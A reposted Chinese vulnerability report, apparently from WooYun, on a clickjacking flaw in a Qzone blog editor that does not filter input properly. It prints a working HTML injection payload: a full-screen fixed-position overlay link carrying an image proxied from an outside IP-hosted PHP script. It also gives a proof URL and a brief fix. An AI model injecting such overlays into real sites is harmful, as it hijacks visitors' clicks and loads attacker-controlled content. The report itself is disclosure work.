来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 简要描述:成因源自于日志编辑器,过滤不严.此clickjacking 主要是做劫持点击之用.ps:不知是否可以定为clickjacking 漏洞,还轻各位鉴定下详细说明:在日志中插入代码span style=position: fixed;t...
|
简要描述:成因源自于日志编辑器,过滤不严.此clickjacking 主要是做劫持点击之用.ps:不知是否可以定为clickjacking 漏洞,还轻各位鉴定下
详细说明:在日志中插入代码 <span style="position: fixed;top: 0px;left: 0.0px;z-index: 4000;width: 1300.0px;height: 1000.0px;color: rgb(0,0,0);"> <a target="_blank" href="http://baidu.com" data-mce-href="http://ppt.cc/ui2K"> <img src="http://qp.qq.com/cgi-bin/cgi_imgproxy?url=http%3A%2F%2F211.20.209.23%3A8888%2Frpm%2Fimg5000.php&size=0" style="height: 870px; width: 870px;"> </a> </span> 漏洞证明:http://user.qzone.qq.com/771044833/blog/1324394065 修复方案:加强编辑器的过滤:D 随便说下 摘自xiao.k@乌云 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
